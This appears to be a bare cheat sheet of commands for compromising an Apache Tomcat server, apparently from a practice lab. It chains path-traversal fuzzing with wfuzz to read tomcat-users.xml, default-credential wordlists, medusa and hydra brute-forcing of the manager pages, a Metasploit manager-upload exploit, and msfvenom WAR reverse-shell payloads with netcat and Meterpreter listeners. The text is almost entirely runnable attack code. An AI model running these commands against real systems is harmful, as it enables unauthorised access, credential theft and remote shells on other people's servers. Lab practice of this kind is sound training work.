Apache Tomcat

ping -c 1 $IP
64 bytes from 10.10.10.95: icmp_seq=1 ttl=127 time=46.8 ms

nmap -p 8080 -Pn -sC -sV $IP

etc
conf
var
lib
ROOT
usr
share
doc
opt
tomcat7
tomcat8
tomcat9
webapps
tomcat7-common
tomcat8-common
tomcat9-common

wfuzz -c -w path.txt -w path.txt --prefilter "FUZZ!=FUZ2Z" -u http://$URL/news.php?file=../../../../FUZZ/FUZ2Z/tomcat-users.xml --hl 0

wfuzz -c -w path.txt -w path.txt -w path.txt --prefilter "FUZZ!=FUZ2Z and FUZZ!=FUZ3Z and FUZ2Z!=FUZ3Z" -u http://$URL/news.php?file=../../../../FUZZ/FUZ2Z/FUZ3Z/tomcat-users.xml --hl 0

wfuzz -c -w path.txt -w path.txt -w path.txt -w path.txt --prefilter "FUZZ!=FUZ2Z and FUZZ!=FUZ3Z and FUZZ!=FUZ4Z and FUZ2Z!=FUZ3Z and FUZ2Z!=FUZ4Z and FUZ3Z!=FUZ4Z" -u http://$URL/news.php?file=../../../../FUZZ/FUZ2Z/FUZ3Z/FUZ4Z/tomcat-users.xml --hl 0

admin
both
manager
role
role1
root
tomcat

password
admin
changethis
manager
password
password1
Password1
r00t
role1
root
s3cret
tomcat
toor

medusa -h $IP -n 8080 -U user.txt -P pass.txt -M  http -m DIR:/manager/status -T 10  

hydra -L user.txt -P pass.txt -s 8080 -f $IP http-get /manager/status

medusa -h $IP -n 8080 -U user.txt -P pass.txt -M  http -m DIR:/manager/html -T 10  

hydra -L user.txt -P pass.txt -s 8080 -f $IP http-get /manager/html 

medusa -h $IP -n 8080 -U user.txt -P pass.txt -M  http -m DIR:/host-manager/html -T 10  

hydra -L user.txt -P pass.txt -s 8080 -f $IP http-get /host-manager/html 

use exploit/multi/http/tomcat_mgr_uploa
set RHOST 10.10.10.95
set RPORT 8080
set LHOST 10.10.14.16
set LPORT 4444
set HttpUsername tomcat
set HttpPassword s3cret
options
run

msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f war -o shell.war

nc -lvnp 4444

msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f war -o shell2.war

msfconsole -q -x "use multi/handler; set payload java/meterpreter/reverse_tcp; set lhost 10.10.14.16; set lport 4444; exploit"